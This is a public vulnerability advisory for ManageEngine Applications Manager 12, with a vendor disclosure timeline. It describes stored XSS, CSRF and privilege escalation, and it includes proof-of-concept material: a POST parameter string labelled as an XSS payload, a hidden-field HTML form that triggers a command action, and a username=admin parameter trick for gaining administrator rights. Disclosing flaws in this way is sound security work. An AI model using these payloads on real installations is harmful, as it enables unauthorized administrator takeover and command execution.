Manage Engine Applications Manager 12 Multiple Vulnerabilities
[Vendor Product Description]
- ManageEngine Applications Manager is an application performance monitoring solution that proactively monitors
business applications and help businesses ensure their revenue-critical applications meet end user expectations.
Applications Manager offers out-of-the-box monitoring support for 50+ applications and servers.
- Site:
[Advisory Timeline]
- 22/10/2015 -> First Contact to Vendor;
- 23/10/2015 -> Vendor responded asking for details;
- 23/10/2015 -> Advisory & Details sent to vendor;
- 03/11/2015 -> Follow up with the vendor. No response received;
- 06/11/2015 -> Second follow up with the vendor. No response received;
- 22/12/2015 -> Final follow up with the vendor. No response received;
- 13/01/2016 -> Public security advisory released;
[Bug Summary]
- Cross Site Scripting (Stored) (CVE-ID Requested)
- Cross Site Request Forgery (CSRF) (CVE-ID Requested)
- Privilege Escalation (CVE-ID Requested)
- High
[Affected Version]
- Applications Manager 12
- ZSL-2016-5292
[Bug Description and Proof of Concept]
1. Cross-Site Request Forgery (CSRF) - The application allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests. This can be exploited to perform certain actions
with administrative privileges if a logged-in user visits a malicious web site
2. Cross Site Scripting (XSS) - Multiple cross-site scripting vulnerabilities were also discovered. The issue is
triggered when input passed via the multiple parameters is not properly sanitized before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
3. Vertical Privilege Escalation - Applications Manager 12 suffers from a privilege escalation issue. Normal user can elevate his/her
privileges by modifying a GET request seting the parameter 'username' to 'admin'. Attacker can exploit this issue using also
cross-site request forgery attacks.
1. Multiple Stored Cross Site Scripting
description (POST)
leftexp1, rightexp1, leftexp2, rightexp2 (POST)
Payload: haid=null&method=editAnomalyProfileAction&id=0&secondarycriticalexist=false&secondarywarningexist=false&secondaryinfoexist=false&select=thresholdNumeric&displayname=&criticalthresholdcondition=GT&criticalthresholdvalue=5&criticalconditionjoiner=OR&secondarycriticalthresholdcondition=GT&secondarycriticalthresholdvalue=5&criticalthresholdmessage=Critical+Alarm+Message&consecutive_mincriticalpolls=Use+global+defaults&consecutive_criticalpolls=Use+global+defaults&warningthresholdcondition=EQ&warningthresholdvalue=5&warningconditionjoiner=OR&secondarywarningthresholdcondition=EQ&secondarywarningthresholdvalue=5&warningthresholdmessage=Warning+Alarm+Message&consecutive_minwarningpolls=Use+global+defaults&consecutive_warningpolls=Use+global+defaults&infothresholdcondition=LT&infothresholdvalue=5&infoconditionjoiner=OR&secondaryinfothresholdcondition=LT&secondaryinfothresholdvalue=5&infothresholdmessage=Clear+Alarm+message&consecutive_minclearpolls=Use+global+defaults&consecutive_clearpolls=
2. Multiple Cross Site Request Forgery (CSRF)
Sample Payload for executing command:
<form action="http://localhost:9090/common/">
<input type="hidden" name="method" value="testAction" />
<input type="hidden" name="actionID" value="10000010" />
<input type="hidden" name="haid" value="null" />
<input type="submit" value="Submit request" />
3. Privilege Escalation on (Become an Admin)
username (GET)
[Escalated Privileges]
All flaws described here were discovered and researched by:
Bikramaditya Guha aka "PhoenixX"